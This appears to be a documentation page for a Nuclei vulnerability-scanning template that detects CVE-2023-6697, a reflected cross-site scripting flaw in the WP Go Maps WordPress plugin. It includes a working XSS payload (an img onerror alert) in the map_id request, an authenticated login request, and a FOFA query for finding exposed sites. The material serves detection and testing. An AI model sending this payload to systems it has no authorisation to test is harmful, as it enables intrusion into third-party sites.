Skip to content

WP Go Maps (formerly WP Google Maps) < 9.0.29 - Cross-Site Scripting

ID: CVE-2023-6697

Severity: medium

Author: iamnoooob,ritikchaddha

Tags: cve,cve2023,wp,wp-plugin,wordpress,xss,wp-go-maps,authenticated

The WP Go Maps (formerly WP Google Maps) plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the map id parameter in all versions up to, and including, 9.0.28 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.

id: CVE-2023-6697
info:
name: WP Go Maps (formerly WP Google Maps) < 9.0.29 - Cross-Site Scripting
author: iamnoooob,ritikchaddha
severity: medium
description: |
The WP Go Maps (formerly WP Google Maps) plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the map id parameter in all versions up to, and including, 9.0.28 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
reference:
- https://wpscan.com/vulnerability/ffcebd9d-82fe-4a30-8ad6-cf6c03753d4c/
- https://nvd.nist.gov/vuln/detail/CVE-2023-6697
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-6697
cwe-id: CWE-79
cpe: cpe:2.3:a:wpgmaps:wp_go_maps:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
fofa-query: body="/wp-content/plugins/wp-google-maps"
vendor: wpgmaps
product: wp_go_maps
tags: cve,cve2023,wp,wp-plugin,wordpress,xss,wp-go-maps,authenticated
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/admin.php?page=wp-google-maps-menu&action=edit&map_id=1aa%27\"><img+src%3Dx+onerror%3Dalert%28document.domain%29> HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<img src="x" onerror="alert(document.domain)">'
- 'Map Alignment</legend>'
condition: and
- type: word
part: content_type
words:
- text/html
- type: status
status:
- 200
# digest: 4b0a0048304602210088ee1333cf9f7204962b623124549d77bf2394afe213862f590e2a0ca3c04ed9022100f4d9ea4ac68af2558ec4a219e27dc022239472639c5b833ab23818237355b14c:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-6697.yaml"

View on Github